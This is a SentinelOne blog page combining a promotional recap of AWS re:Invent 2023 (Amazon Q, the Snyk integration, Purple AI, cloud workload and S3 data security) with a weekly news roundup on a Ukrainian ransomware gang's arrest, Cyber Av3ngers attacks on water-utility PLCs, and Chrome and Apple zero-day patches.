At SentinelOne, we have been harnessing the power of AI and machine learning for over a decade, staying ahead in the cybersecurity landscape. These technologies, crucial in the fight against ransomware, must be complemented by a stronger alliance between private and public sector leaders. Setting a new standard in cybersecurity and working towards eliminating ransomware as a viable attack method requires a unified effort that transcends individual strategies and recommendations.

If you are ready to experience the advanced protection that SentinelOne offers, our dedicated team is here to assist you. Request a demo and see firsthand how our solutions can safeguard your digital landscape against the evolving cyber threats of today and tomorrow.

SentinelOne Singularity XDR
Supercharge. Fortify. Automate. Extend protection with unfettered visibility, proven protection, and unparalleled response.

AWS re:Invent 2023 Highlights | Showcasing the Latest Advances in Cloud Security and Innovation

Last week’s AWS re:Invent 2023, held in Las Vegas, was a milestone event showcasing the latest innovations in cloud security. This year, the focus was on the transformative role of Generative AI in cloud computing, a theme that resonated throughout the conference’s keynotes, breakout sessions, and hands-on labs.

In this post, we unpack the essential takeaways from AWS re:Invent 2023. We explore the significant advancements in AI and machine learning (ML) and delve into some of the important new integrations and collaborations announced.

The Rise of Generative AI in Cloud Computing

The standout theme at AWS re:Invent 2023 was unmistakably Generative AI, encapsulated by AWS CEO Adam Selipsky’s keynote. The introduction of Amazon Q marked a significant milestone: a generative AI-powered assistant designed to revolutionize how businesses operate across various sectors. Additionally, the launch of Guardrails for Amazon Bedrock represents a commitment to ensuring the secure and responsible scaling of generative AI applications.

In his keynote, Adam explored AWS’s strategic vision to leverage Generative AI across three key areas:

  1. Infrastructure for AI Training and Inference: Highlighting the need for robust infrastructure to support AI and ML models, AWS offers solutions to cater to fluctuating demands and ensure high-performance outcomes.
  2. Tools for Building with Large Language Models (LLMs): AWS is investing in tools that enable seamless integration and utilization of LLMs and foundational models (FMs) in cloud computing.
  3. AI-Driven Applications: The focus here is on creating applications that leverage FMs, tailoring AI to meet specific business needs and operational requirements.

SentinelOne at AWS re:Invent | Educating on AI in Cloud Security

SentinelOne played a pivotal role at AWS re:Invent with a compelling breakout session led by Field CISO Mani Keerthi Nagothu and Technical Field Leader Jeremy “Howie” Howerton.

Their presentation, “The Challenges of AI in Cloud Security,” provided an in-depth look at AI models, their practical applications in cloud security, and best practices for solution evaluation. The session also featured a real-world case study on a ransomware attack, showcasing SentinelOne’s expertise and drawing a highly engaged audience.

SentinelOne and Snyk Integration | Enhancing Cloud-Native Application Security

The recently announced collaboration between SentinelOne and Snyk is more than just a technological advancement; it’s a strategic move towards closing the loop in cloud-native application security. By covering both the build and runtime aspects of application security, this partnership ensures a more robust and resilient security posture for cloud-native applications.

The value and depth of this partnership to both developer and security teams were validated by re:Invent attendees, with the technical demos and joint talks in both the SentinelOne and Snyk booths at capacity.

Snyk’s role in this partnership focuses on the early stages of application development. Its Container image vulnerability scanning empowers developers and DevOps teams to detect and prioritize vulnerabilities right from the outset.

By embedding security into the DevOps pipeline, Snyk Container ensures that potential vulnerabilities are addressed before the application goes live, effectively minimizing risks in the production environment. This proactive approach is crucial in today’s fast-paced development cycles, where security can no longer be an afterthought.

Real-Time Threat Detection and Response with SentinelOne’s CWPP and Cloud Data Security

SentinelOne has lots to offer when it comes to devops-friendly security for cloud environments, with both workload and cloud data security options being showcased at re:Invent. By focusing on simple, cloud-native deployment approaches, backed by powerful detection engines and deep threat hunting capabilities, these solutions caught the attention of attendees.  Complementing Snyk’s build-time focus, SentinelOne’s CWPP comes into play during the application’s runtime. It excels in identifying and mitigating real-time threats such as ransomware, zero-day exploits, and advanced persistent threats.

The spotlight on SentinelOne’s CWPP at AWS re:Invent underscores its importance in the current cybersecurity landscape. As organizations increasingly migrate to the cloud and embrace digital transformation, the need for robust, real-time security solutions becomes paramount.

SentinelOne’s CWPP offers a powerful, flexible, and intelligent solution to protect cloud workloads against a wide array of cyber threats, making it an essential tool for businesses looking to secure their cloud infrastructure.

For organizations looking to enhance their cloud security posture, exploring the capabilities of SentinelOne’s CWPP could be a critical step towards achieving a secure and resilient cloud infrastructure.SentinelOne’s Singularity Cloud Data Security is a newer offering, with options to provide automated malware scanning for Amazon S3, and NetApp, directly in the customer’s environment. This solution helps customers identify suspicious and malicious files within their environment, and can remove and quarantine them quickly. With most modern applications leveraging S3, it’s critical for organizations to protect applications (both using the buckets and downstream) from threats within their storage.

Visibility of resources, especially when being spun up and spun down quickly, and data sovereignty were common topics of discussion when it came to protecting cloud data. Cloud Data Security addresses visibility by inventorying all S3 buckets connected to an account, and by applying policy based controls and rules at time of creation. When it comes to data sovereignty, SentinelOne does all scanning of the objects within the customers bucket- the object never leaves their environment, meeting key guidelines and regulations for many industries.

Networking and Entertainment | Fostering Connections and Fun

AWS re:Invent 2023 wasn’t just about the latest in cloud technology; it also offered ample opportunities for networking and entertainment. The event’s social highlight was the after-party at Juliet Cocktail Lounge, co-hosted with tech partners like Snyk and NinjaOne. This event stood out for its great music, engaging discussions, and a chance for attendees to relax and network in a more informal setting.

Additionally, the “Take the Wheel On Your AWS Applications” event provided a unique and interactive experience outside the usual conference environment, while the Recovery Breakfast at The Yardbird offered a quieter but equally engaging atmosphere for morning discussions. These events underscored the importance of balancing professional learning with fun and networking at tech conferences.

Booth Highlights | SentinelOne’s Showcase of Innovation

SentinelOne’s presence at AWS re:Invent 2023 was marked by a flurry of innovation and expertise, with the booth emerging as a focal point of technological showcase. The booth functioned as a hub of activity with a series of informative presentations, demonstrations, and interactive sessions that highlighted SentinelOne’s leading role in cloud security and AI.

In-Depth Session on Purple AI

Holly Bittinger’s talk on Purple AI delved into the nuances of Purple AI, explaining how it accelerates threat investigations and simplifies security operations.

Purple AI  allows analysts to identify, analyze, and mitigate threats using conversational prompts and interactive dialog, leveraging large language models (LLMs) to supercharge threat detection and response. By demonstrating Purple AI’s capabilities, Holly showcased SentinelOne’s commitment to enhancing AI’s role in cybersecurity.

Snyk and SentinelOne Integration | A Practical Demo

The integration between Snyk and SentinelOne was another highlight, drawing attention to their collaborative efforts in cloud-native application security. The live demonstration provided a practical insight into how the integration enhances security from build-time to runtime, effectively addressing cloud vulnerabilities through an in-depth analysis of the IceFire ransomware attack.

The demonstration offered attendees a glimpse into the complexities of modern cybersecurity challenges and SentinelOne’s adeptness in addressing them.

Singularity Cloud Demos | Cloud Rogues and eBPF

The Singularity Cloud demos were exceptionally popular, attracting a large audience interested in the latest cloud security innovations. These demos highlighted key features such as Cloud Rogues and the benefits of extended Berkeley Packet Filter (eBPF), emphasizing SentinelOne’s forward-thinking approach in cloud security.

The interactive nature of these demos allowed attendees to experience firsthand the efficiency and effectiveness of SentinelOne’s solutions. Participants gained valuable insights into how SentinelOne’s technologies can be applied in various scenarios, offering practical knowledge that goes beyond theoretical understanding.

Looking Ahead | Continuing the Cloud Security Conversation

As AWS re:Invent 2023 was a fantastic experience showcasing the convergence of innovation and community in cloud technology. We’re already looking forward to next year’s AWS re:Invent and the opportunity to connect again with the cloud computing community.

Looking forward, we’re excited to continue exploring the evolving landscape of cloud security. Join us at our upcoming webinar on December 14th for an in-depth look at the latest trends, particularly the impact of AI in cloud security.

Contact us to learn more about what SentinelOne is doing to evolve the cyber defense industry or book a demo to get more in-depth experience with our newest integrations and security offerings.

Navigating the AI-Driven Landscape of Cloud Security | Trends and Insights
Thursday, December 14 at 10:00 a.m. PST / 1:00 p.m. EST

The Good, the Bad and the Ugly in Cybersecurity – Week 48

The Good | Ukrainian Ransomware Gang Busted By Cyber Cops

A ransomware gang operating out of Kyiv, Ukraine has been taken down by European police, it was announced this week. It is estimated the gang had attacked more than 250 servers across 71 countries during its active lifetime and caused losses of several hundred million euros.

A joint police task force raided 30 locations and seized over a hundred devices, resulting in the arrest of four individuals and the alleged ringleader of the gang. Europol said that the gang broke into networks using phishing emails, brute force attacks, SQL injection and stolen credentials. Once inside a network, they deployed tools such as Cobalt Strike and TrickBot to further their access. They would then remain hidden, sometimes for months, before deploying various kinds of malware, including LockerGoga, MegaCortex, HIVE and Dharma ransomware to lock files and extract payment from victims.

The gang ransomed multiple global organizations located in France, Norway, Germany, The Netherlands, Canada and the U.S. In one example, they demanded 450 BTC (around $17m today) from a leading chemical company in the Netherlands.

The raids, which took place on November 21, were part of a long-standing operation that began in 2019 to identify and disrupt cyber criminal activity in Ukraine. Previous arrests in 2021 led authorities to develop decryptors for some of the gang’s ransomware tools. The operation continues as authorities continue to hunt for other associates of the arrested suspects.

The Bad | Hacktivists Target U.S. Water Treatment Plants

CISA is warning critical infrastructure organizations to be on the alert this week after Iranian-backed threat actors were found to be attacking U.S. water treatment plants and other organizations with embedded Unitronics PLCs.

A Pro-Hamas “Hacktivist” group calling itself “Cyber Av3ngers” has perpetrated intrusions into a number of U.S. organizations by exploiting weak or default passwords in the Israeli-made ICS devices. Aliquippa’s Municipal Water Authority was breached by the threat actor as was a brewery in Pittsburgh. The attackers use network scanning tools to hunt for vulnerable devices connected to the public internet and then attempt to brute force entry through known or weak passwords.

Source: BeaverCountain.com

Cyber Av3ngers is known to be an arm of the Iranian IRGC, with a history of attacking industrial targets in relatively unsophisticated attacks. It makes much use of social media to broadcast sometimes false and often exaggerated claims about high-profile hacks. It has been suggested that the group’s social media persona is linked to another threat actor known as Soldiers of Solomon. Other groups that appear to be conducting campaigns against industrial infrastructure include GhostSec.

Although the damage caused in the cases seen so far appears to have been minimal and mitigation relatively quick, the fact that critical infrastructure appears to be easily compromised and is currently being targeted by active groups is a cause for concern. CISA advises all admins of embedded industrial control systems to change default settings, use strong passwords and take other mitigating measures as outlined here.

The Ugly | 3 More Zero Days Found in Chrome & Apple OSes

It’s that time of the month again. Not quite ‘Patch Tuesday’, but the increasingly frequent warning “Apple is aware of a report” that a new zero day (or two) “may have been exploited” in the wild is upon us once more. Users are being urged to update all their Apple things – and Chrome too, while they’re at it – after Google’s TAG team reported three critical severity zero days in its own and Apple’s products.

Tuesday saw Google release patches for seven vulnerabilities in Chrome including CVE-2023-6345. Few details were disclosed about the bug other than that it involves an integer overflow in the Skia Graphics Engine. Skia is used in Chrome to handle tasks such as drawing shapes, text and images on web pages. What Google did say, importantly, is that it was “aware that an exploit for CVE-2023-6345 exists in the wild.”

Meanwhile, on Thursday, Apple issued updates across its desktop and mobile platforms for two vulnerabilities in its WebKit browser engine. On Apple’s mobile platforms, WebKit is used by all browsers, not just Safari. CVE-2023-42916 is an out-of-bounds read issue that could be used to leak sensitive information when processing web content. CVE-2023-42917 is a memory corruption bug that could result in arbitrary code execution when processing web content.

Both flaws were credited to the same Google TAG researcher that reported CVE-2023-6345, suggesting that their discovery was linked. Apple said it was aware of reports that the bugs may have been exploited against versions of iOS before 16.7.1.

As 2023 begins to draw to a close, it’s worth noting that it’s been a record year for Apple zero days, with 19 reported as being ‘actively exploited’ in the wild to date. It’s a sign not only of the company’s products’ popularity but also of their vulnerability.

Apple’s closed mobile ecosystem makes malware detection and remediation challenging for even the most technical of users, while many among its macOS user base still subscribe to the outdated thinking that ‘Macs don’t get malware’. Such folks need to update both their devices and their understanding of the modern cyber threat landscape if they wish to avoid calamity down the road.